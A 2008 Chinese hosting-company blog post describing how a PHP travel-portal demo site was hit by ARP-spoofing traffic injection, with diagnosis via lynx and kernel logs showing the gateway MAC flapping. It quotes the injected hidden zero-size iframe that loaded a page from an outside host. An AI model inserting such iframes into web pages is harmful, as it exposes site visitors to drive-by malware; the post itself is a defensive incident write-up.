手机站
网通分站
电信主站
密 码:
用户名:
当前位置 : 主页>网站运营>建站经验>列表

网站被ARP欺骗挂马故障解决维护记要

来源:互联网 作者:west263.com 时间:2008-02-21
西部数码-全国虚拟主机10强!40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

上周公司产品川铎旅游门户系统[cdtour.bbwps.com]演示站遭遇ARP欺骗挂马,故障解决后维护记要分享:

故障现象:网站程序是PHP开发的,被挂马后一浏览就显示乱码,查看HTML源代码,第一行被强行加了代码:<iframe src=http://xxx.hao1680.com/xx.htm?id=007 width=0 height=0></iframe> 。上次遇见的挂马是JS代码,先按照上次故障解决思路做了调整:

1、分别检查apache、PHP系统是否有打开压缩输出,上次的JS挂马就是启动apache压缩输出修复;但这次的iframe挂马再用这招没有作用。当时还没有想到是ARP欺骗挂马,把apache、PHP都做了版本升级,发现还是挂马,于是在同事提示下,换个检查思路。

2、公司服务器采用的FreeBSD系统,安装上lynx文本浏览器:
1)从托管在另一家运营商的服务器远程浏览被挂马站点,获读反馈的显示依然有挂马代码;
2)在被挂马服务器上lynx浏览自身,内容显示正常,证明服务器自身系统及内容是正常的,数据经过所在网段网关后被加了代码;
3)查看系统日志,tail -f /var/log/messages,连续不断的重复以下内容:
Jan 3 15:48:07 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:15:60:96:d4:35 to 00:18:74:2f:3r:99 on em0
Jan 3 15:48:07 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:18:74:2f:3r:99 to 00:15:60:96:d4:35 on em0
Jan 3 15:48:09 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:15:60:96:d4:35 to 00:18:74:2f:3r:99 on em0
Jan 3 15:48:09 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:18:74:2f:3r:99 to 00:15:60:96:d4:35 on em0
Jan 3 15:48:16 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:15:60:96:d4:35 to 00:18:74:2f:3r:99 on em0
其中xx.xx.xxx.xxx是服务器所在网络的网关地址,于是联系机房提供信息,机房断掉某台托管设备后挂马问题解决。

责任编辑:稻草

文章整理:西部数码--专业提供域名注册虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!